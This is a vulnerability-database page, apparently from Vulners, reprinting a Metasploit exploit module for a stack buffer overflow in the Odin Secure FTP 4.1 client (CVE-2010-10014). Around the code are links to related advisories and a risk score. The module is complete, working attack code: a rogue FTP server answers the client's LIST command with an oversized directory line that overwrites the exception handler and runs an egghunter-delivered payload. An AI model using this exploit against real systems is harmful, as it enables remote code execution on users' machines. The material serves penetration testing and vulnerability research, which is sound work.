Lucene search
+L

Odin Secure FTP 4.1 Stack Buffer Overflow (LIST)

🗓️ 12 Oct 2010 00:00:00Reported by rick2600, corelanc0d3r <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 24 Views

Odin Secure FTP 4.1 Stack Buffer Overflow in LIST command respons

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2010-10014
20 Aug 202515:38
attackerkb
circl
Circl
CVE-2010-10014
29 May 201815:50
circl
cnnvd
CNNVD
Odin Secure FTP 安全漏洞
20 Aug 202500:00
cnnvd
cve
CVE
CVE-2010-10014
20 Aug 202515:38
cve
cvelist
Cvelist
CVE-2010-10014 Odin Secure FTP <= 4.1 Stack Buffer Overflow via LIST Response
20 Aug 202515:38
cvelist
euvd
EUVD
EUVD-2010-5302
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-10014
20 Aug 202516:15
nvd
ptsecurity
Positive Technologies
PT-2025-34095 · Undefined · Undefined
20 Aug 202500:00
ptsecurity
redhatcve
RedhatCVE
CVE-2010-10014
22 Aug 202516:35
redhatcve
vulnrichment
Vulnrichment
CVE-2010-10014 Odin Secure FTP <= 4.1 Stack Buffer Overflow via LIST Response
20 Aug 202515:38
vulnrichment
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::FtpServer
  include Msf::Exploit::Remote::Egghunter

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Odin Secure FTP 4.1 Stack Buffer Overflow (LIST)',
        'Description' => %q{
          This module exploits a stack buffer overflow in Odin Secure FTP 4.1,
          triggered when processing the response on a LIST command. During the overflow,
          a structured exception handler record gets overwritten.
        },
        'Author' => [
          'rick2600',	# found the bug
          'corelanc0d3r <peter.ve[at]corelan.be>',	# wrote the exploit
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2010-10014' ],
          [ 'OSVDB', '68824' ],
          [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Payload' => {
          'BadChars' => "\x00\xff\x0d\x5c\x2f\x0a",
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'XP SP3 Universal', { 'Offset' => 264, 'Ret' => 0x10077622 } ], # ppr [appface.dll]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2010-10-12',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  def setup
    super
  end

  def on_client_unknown_command(c, cmd, arg)
    c.put("200 OK\r\n")
  end

  def on_client_command_list(c, arg)
    conn = establish_data_connection(c)
    if (not conn)
      c.put("425 Can't build data connection\r\n")
      return
    end
    print_status(" - Data connection set up")
    code = 150
    c.put("#{code} Here comes the directory listing.\r\n")
    code = 226
    c.put("#{code} Directory send ok.\r\n")

    badchars = ""
    eggoptions =
      {
        :checksum => true,
        :eggtag => "W00T"
      }
    hunter, egg = generate_egghunter(payload.encoded, badchars, eggoptions)

    badchars = "\x00\xff\x0d\x5c\x2f\x0a"
    hunterenc = Msf::Util::EXE.encode_stub(framework, [ARCH_X86], hunter, ::Msf::Module::PlatformList.win32, badchars)

    offset_to_nseh = target['Offset']
    jmpback = "\xe9\x9c\xff\xff\xff"
    nops = "A" * 30
    filename = "A" * (offset_to_nseh - hunterenc.length - jmpback.length)

    nseh = "\xeb\xf9\x42\x42"
    seh = [target.ret].pack('V')
    junk2 = "A" * 4000

    buffer = filename + hunterenc + jmpback + nseh + seh + junk2 + egg
    print_status(" - Sending directory list via data connection")
    dirlist = "-rw-rw-r--    1 1176     1176         1060 Aug 16 22:22 #{buffer}\r\n"
    conn.put(dirlist)
    conn.close
    print_status(" - Payload sent, wait for hunter...")
    return
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Oct 2010 00:00Current
5.6Medium risk
Vulners AI Score5.6
CVSS 48.7
EPSS0.01031
SSVC
24